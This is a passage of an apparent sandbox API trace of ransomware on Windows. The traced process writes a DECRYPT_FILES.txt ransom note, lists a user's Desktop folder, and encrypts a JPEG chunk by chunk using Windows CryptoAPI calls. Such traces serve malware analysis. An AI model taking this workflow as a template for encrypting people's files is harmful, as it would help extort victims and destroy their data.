lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x35 [0055.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee620) returned 1 [0055.636] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\DECRYPT_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x408 [0055.636] GetFileType (hFile=0x408) returned 0x1 [0055.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee590) returned 1 [0055.636] GetFileType (hFile=0x408) returned 0x1 [0055.637] WriteFile (in: hFile=0x408, lpBuffer=0x2213cb0*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1c0ee668, lpOverlapped=0x0 | out: lpBuffer=0x2213cb0*, lpNumberOfBytesWritten=0x1c0ee668*=0x9d5, lpOverlapped=0x0) returned 1 [0055.637] CloseHandle (hObject=0x408) returned 1 [0055.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0055.638] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings", lpFilePart=0x0) returned 0x2c [0055.638] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpFilePart=0x0) returned 0x2d [0055.638] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0055.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5e0) returned 1 [0055.640] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0055.710] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0055.766] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0055.796] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0055.811] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0055.830] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0057.229] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0057.296] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0057.307] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0057.316] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0057.386] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0058.643] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0058.815] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0058.877] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0058.940] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0058.975] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0059.005] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0059.026] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0059.872] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0060.256] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0060.262] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0060.274] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0060.277] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0060.280] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0060.284] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0060.307] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0061.492] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0061.516] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0061.525] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0061.555] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0061.563] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0061.567] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0061.585] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0061.593] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.308] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.743] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.756] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.765] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.768] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.774] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.793] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.805] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.870] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.879] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.886] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.890] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.894] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.917] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.926] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.486] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0070.682] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0070.682] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy", lpFilePart=0x0) returned 0x2a [0070.682] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\", lpFilePart=0x0) returned 0x2b [0070.682] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb70da3d0, ftCreationTime.dwHighDateTime=0x1d4ca17, ftLastAccessTime.dwLowDateTime=0xc4c72840, ftLastAccessTime.dwHighDateTime=0x1d4d22b, ftLastWriteTime.dwLowDateTime=0xc4c72840, ftLastWriteTime.dwHighDateTime=0x1d4d22b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de090 [0070.682] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb70da3d0, ftCreationTime.dwHighDateTime=0x1d4ca17, ftLastAccessTime.dwLowDateTime=0xc4c72840, ftLastAccessTime.dwHighDateTime=0x1d4d22b, ftLastWriteTime.dwLowDateTime=0xc4c72840, ftLastWriteTime.dwHighDateTime=0x1d4d22b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.682] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23b4a9b0, ftCreationTime.dwHighDateTime=0x1d4d47d, ftLastAccessTime.dwLowDateTime=0xffc50120, ftLastAccessTime.dwHighDateTime=0x1d4cca8, ftLastWriteTime.dwLowDateTime=0xffc50120, ftLastWriteTime.dwHighDateTime=0x1d4cca8, nFileSizeHigh=0x0, nFileSizeLow=0x16577, dwReserved0=0x0, dwReserved1=0x0, cFileName="4HKzaa.ots", cAlternateFileName="")) returned 1 [0070.682] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x222e8320, ftCreationTime.dwHighDateTime=0x1d4d3b2, ftLastAccessTime.dwLowDateTime=0xfc3a1d20, ftLastAccessTime.dwHighDateTime=0x1d4ca6d, ftLastWriteTime.dwLowDateTime=0xfc3a1d20, ftLastWriteTime.dwHighDateTime=0x1d4ca6d, nFileSizeHigh=0x0, nFileSizeLow=0x1497c, dwReserved0=0x0, dwReserved1=0x0, cFileName="cicS85OQp.jpg", cAlternateFileName="CICS85~1.JPG")) returned 1 [0070.682] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce57bf20, ftCreationTime.dwHighDateTime=0x1d4cb7b, ftLastAccessTime.dwLowDateTime=0x8e624e30, ftLastAccessTime.dwHighDateTime=0x1d4c8b5, ftLastWriteTime.dwLowDateTime=0x8e624e30, ftLastWriteTime.dwHighDateTime=0x1d4c8b5, nFileSizeHigh=0x0, nFileSizeLow=0xf993, dwReserved0=0x0, dwReserved1=0x0, cFileName="gohgOJq6xmshJlan.rtf", cAlternateFileName="GOHGOJ~1.RTF")) returned 1 [0070.683] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d0c60e0, ftCreationTime.dwHighDateTime=0x1d4cda6, ftLastAccessTime.dwLowDateTime=0xa7f46660, ftLastAccessTime.dwHighDateTime=0x1d4cd8a, ftLastWriteTime.dwLowDateTime=0xa7f46660, ftLastWriteTime.dwHighDateTime=0x1d4cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x11131, dwReserved0=0x0, dwReserved1=0x0, cFileName="OtDkuC0245.png", cAlternateFileName="OTDKUC~1.PNG")) returned 1 [0070.683] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3e8ae10, ftCreationTime.dwHighDateTime=0x1d4ce3f, ftLastAccessTime.dwLowDateTime=0x47a48140, ftLastAccessTime.dwHighDateTime=0x1d4d088, ftLastWriteTime.dwLowDateTime=0x47a48140, ftLastWriteTime.dwHighDateTime=0x1d4d088, nFileSizeHigh=0x0, nFileSizeLow=0x16de7, dwReserved0=0x0, dwReserved1=0x0, cFileName="XwQBoB6BWx1Gh4jHk.odp", cAlternateFileName="XWQBOB~1.ODP")) returned 1 [0070.683] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x674220d0, ftCreationTime.dwHighDateTime=0x1d4c821, ftLastAccessTime.dwLowDateTime=0x8ca34130, ftLastAccessTime.dwHighDateTime=0x1d4d30a, ftLastWriteTime.dwLowDateTime=0x8ca34130, ftLastWriteTime.dwHighDateTime=0x1d4d30a, nFileSizeHigh=0x0, nFileSizeLow=0xa10c, dwReserved0=0x0, dwReserved1=0x0, cFileName="_-VVa.png", cAlternateFileName="")) returned 1 [0070.683] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e9cf7f0, ftCreationTime.dwHighDateTime=0x1d4d475, ftLastAccessTime.dwLowDateTime=0x9a532770, ftLastAccessTime.dwHighDateTime=0x1d4c840, ftLastWriteTime.dwLowDateTime=0x9a532770, ftLastWriteTime.dwHighDateTime=0x1d4c840, nFileSizeHigh=0x0, nFileSizeLow=0x7c83, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aSRFi4Z5Nq3ujRm.m4a", cAlternateFileName="_ASRFI~1.M4A")) returned 1 [0070.683] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0070.683] FindClose (in: hFindFile=0x1a5de090 | out: hFindFile=0x1a5de090) returned 1 [0070.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee600) returned 1 [0070.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5c0) returned 1 [0070.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0070.683] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy", lpFilePart=0x0) returned 0x2a [0070.684] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\", lpFilePart=0x0) returned 0x2b [0070.684] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb70da3d0, ftCreationTime.dwHighDateTime=0x1d4ca17, ftLastAccessTime.dwLowDateTime=0xc4c72840, ftLastAccessTime.dwHighDateTime=0x1d4d22b, ftLastWriteTime.dwLowDateTime=0xc4c72840, ftLastWriteTime.dwHighDateTime=0x1d4d22b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de090 [0070.684] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb70da3d0, ftCreationTime.dwHighDateTime=0x1d4ca17, ftLastAccessTime.dwLowDateTime=0xc4c72840, ftLastAccessTime.dwHighDateTime=0x1d4d22b, ftLastWriteTime.dwLowDateTime=0xc4c72840, ftLastWriteTime.dwHighDateTime=0x1d4d22b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.684] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23b4a9b0, ftCreationTime.dwHighDateTime=0x1d4d47d, ftLastAccessTime.dwLowDateTime=0xffc50120, ftLastAccessTime.dwHighDateTime=0x1d4cca8, ftLastWriteTime.dwLowDateTime=0xffc50120, ftLastWriteTime.dwHighDateTime=0x1d4cca8, nFileSizeHigh=0x0, nFileSizeLow=0x16577, dwReserved0=0x0, dwReserved1=0x0, cFileName="4HKzaa.ots", cAlternateFileName="")) returned 1 [0070.684] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x222e8320, ftCreationTime.dwHighDateTime=0x1d4d3b2, ftLastAccessTime.dwLowDateTime=0xfc3a1d20, ftLastAccessTime.dwHighDateTime=0x1d4ca6d, ftLastWriteTime.dwLowDateTime=0xfc3a1d20, ftLastWriteTime.dwHighDateTime=0x1d4ca6d, nFileSizeHigh=0x0, nFileSizeLow=0x1497c, dwReserved0=0x0, dwReserved1=0x0, cFileName="cicS85OQp.jpg", cAlternateFileName="CICS85~1.JPG")) returned 1 [0070.684] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce57bf20, ftCreationTime.dwHighDateTime=0x1d4cb7b, ftLastAccessTime.dwLowDateTime=0x8e624e30, ftLastAccessTime.dwHighDateTime=0x1d4c8b5, ftLastWriteTime.dwLowDateTime=0x8e624e30, ftLastWriteTime.dwHighDateTime=0x1d4c8b5, nFileSizeHigh=0x0, nFileSizeLow=0xf993, dwReserved0=0x0, dwReserved1=0x0, cFileName="gohgOJq6xmshJlan.rtf", cAlternateFileName="GOHGOJ~1.RTF")) returned 1 [0070.684] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d0c60e0, ftCreationTime.dwHighDateTime=0x1d4cda6, ftLastAccessTime.dwLowDateTime=0xa7f46660, ftLastAccessTime.dwHighDateTime=0x1d4cd8a, ftLastWriteTime.dwLowDateTime=0xa7f46660, ftLastWriteTime.dwHighDateTime=0x1d4cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x11131, dwReserved0=0x0, dwReserved1=0x0, cFileName="OtDkuC0245.png", cAlternateFileName="OTDKUC~1.PNG")) returned 1 [0070.685] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3e8ae10, ftCreationTime.dwHighDateTime=0x1d4ce3f, ftLastAccessTime.dwLowDateTime=0x47a48140, ftLastAccessTime.dwHighDateTime=0x1d4d088, ftLastWriteTime.dwLowDateTime=0x47a48140, ftLastWriteTime.dwHighDateTime=0x1d4d088, nFileSizeHigh=0x0, nFileSizeLow=0x16de7, dwReserved0=0x0, dwReserved1=0x0, cFileName="XwQBoB6BWx1Gh4jHk.odp", cAlternateFileName="XWQBOB~1.ODP")) returned 1 [0070.685] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x674220d0, ftCreationTime.dwHighDateTime=0x1d4c821, ftLastAccessTime.dwLowDateTime=0x8ca34130, ftLastAccessTime.dwHighDateTime=0x1d4d30a, ftLastWriteTime.dwLowDateTime=0x8ca34130, ftLastWriteTime.dwHighDateTime=0x1d4d30a, nFileSizeHigh=0x0, nFileSizeLow=0xa10c, dwReserved0=0x0, dwReserved1=0x0, cFileName="_-VVa.png", cAlternateFileName="")) returned 1 [0070.685] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e9cf7f0, ftCreationTime.dwHighDateTime=0x1d4d475, ftLastAccessTime.dwLowDateTime=0x9a532770, ftLastAccessTime.dwHighDateTime=0x1d4c840, ftLastWriteTime.dwLowDateTime=0x9a532770, ftLastWriteTime.dwHighDateTime=0x1d4c840, nFileSizeHigh=0x0, nFileSizeLow=0x7c83, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aSRFi4Z5Nq3ujRm.m4a", cAlternateFileName="_ASRFI~1.M4A")) returned 1 [0070.685] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e9cf7f0, ftCreationTime.dwHighDateTime=0x1d4d475, ftLastAccessTime.dwLowDateTime=0x9a532770, ftLastAccessTime.dwHighDateTime=0x1d4c840, ftLastWriteTime.dwLowDateTime=0x9a532770, ftLastWriteTime.dwHighDateTime=0x1d4c840, nFileSizeHigh=0x0, nFileSizeLow=0x7c83, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aSRFi4Z5Nq3ujRm.m4a", cAlternateFileName="_ASRFI~1.M4A")) returned 0 [0070.685] FindClose (in: hFindFile=0x1a5de090 | out: hFindFile=0x1a5de090) returned 1 [0070.685] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee600) returned 1 [0070.685] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5c0) returned 1 [0070.685] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", nBufferLength=0x105, lpBuffer=0x1c0ee230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", lpFilePart=0x0) returned 0x38 [0070.686] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", nBufferLength=0x105, lpBuffer=0x1c0ee230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", lpFilePart=0x0) returned 0x38 [0070.687] CryptAcquireContextW (in: phProv=0x1c0ee598, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1c0ee598*=0x1a5b7710) returned 1 [0070.687] CryptImportKey (in: hProv=0x1a5b7710, pbData=0x214be60, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1c0ee550 | out: phKey=0x1c0ee550*=0x1a626bb0) returned 1 [0070.688] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0070.688] CryptExportKey (in: hKey=0x1a626bb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1c0ee660 | out: pbData=0x0*, pdwDataLen=0x1c0ee660*=0x1c) returned 1 [0070.688] CryptExportKey (in: hKey=0x1a626bb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x214bf50, pdwDataLen=0x1c0ee660 | out: pbData=0x214bf50*, pdwDataLen=0x1c0ee660*=0x1c) returned 1 [0070.688] CryptImportKey (in: hProv=0x1a5b7710, pbData=0x214c070, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1c0ee520 | out: phKey=0x1c0ee520*=0x1a626ad0) returned 1 [0070.688] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0070.688] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0070.688] CryptDuplicateKey (in: hKey=0x1a626ad0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1c0ee510 | out: phKey=0x1c0ee510*=0x1a626b40) returned 1 [0070.688] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0070.688] CryptSetKeyParam (hKey=0x1a626b40, dwParam=0x4, pbData=0x214c1b8*=0x1, dwFlags=0x0) returned 1 [0070.688] CryptSetKeyParam (hKey=0x1a626b40, dwParam=0x1, pbData=0x214c168, dwFlags=0x0) returned 1 [0070.688] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0070.688] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0070.688] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", nBufferLength=0x105, lpBuffer=0x1c0edf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", lpFilePart=0x0) returned 0x38 [0070.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee460) returned 1 [0070.688] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\cics85oqp.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.688] GetFileType (hFile=0x398) returned 0x1 [0070.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee3d0) returned 1 [0070.688] GetFileType (hFile=0x398) returned 0x1 [0070.688] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\F5F89E0F78370BA0FF833857812EA068", nBufferLength=0x105, lpBuffer=0x1c0edf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\F5F89E0F78370BA0FF833857812EA068", lpFilePart=0x0) returned 0x4b [0070.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee460) returned 1 [0070.689] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\F5F89E0F78370BA0FF833857812EA068" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\f5f89e0f78370ba0ff833857812ea068"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0070.689] GetFileType (hFile=0x384) returned 0x1 [0070.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee3d0) returned 1 [0070.689] GetFileType (hFile=0x384) returned 0x1 [0070.689] ReadFile (in: hFile=0x398, lpBuffer=0x214c570, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1c0ee558, lpOverlapped=0x0 | out: lpBuffer=0x214c570*, lpNumberOfBytesRead=0x1c0ee558*=0x14000, lpOverlapped=0x0) returned 1 [0070.691] CryptEncrypt (in: hKey=0x1a626b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2160588*, pdwDataLen=0x1c0ee5b0*=0x14000, dwBufLen=0x14000 | out: pbData=0x2160588*, pdwDataLen=0x1c0ee5b0*=0x14000) returned 1 [0070.691] WriteFile (in: hFile=0x384, lpBuffer=0x2160588*, nNumberOfBytesToWrite=0x14000, lpNumberOfBytesWritten=0x1c0ee548, lpOverlapped=0x0 | out: lpBuffer=0x2160588*, lpNumberOfBytesWritten=0x1c0ee548*=0x14000, lpOverlapped=0x0) returned 1 [0070.693] ReadFile (in: hFile=0x398, lpBuffer=0x214c570, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1c0ee558, lpOverlapped=0x0 | out: lpBuffer=0x214c570*, lpNumberOfBytesRead=0x1c0ee558*=0x97c, lpOverlapped=0x0) returned 1 [0070.693] CryptEncrypt (in: hKey=0x1a626b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21745c8*, pdwDataLen=0x1c0ee5b0*=0x970, dwBufLen=0x970 | out: pbData=0x21745c8*, pdwDataLen=0x1c0ee5b0*=0x970) returned 1 [0070.693] ReadFile (in: hFile=0x398, lpBuffer=0x214c570, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1c0ee558, lpOverlapped=0x0 | out: lpBuffer=0x214c570*, lpNumberOfBytesRead=0x1c0ee558*=0x0, lpOverlapped=0x0) returned 1 [0070.694] CryptEncrypt (in: hKey=0x1a626b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2175f90*, pdwDataLen=0x1c0ee4f0*=0x10, dwBufLen=0x10 | out: 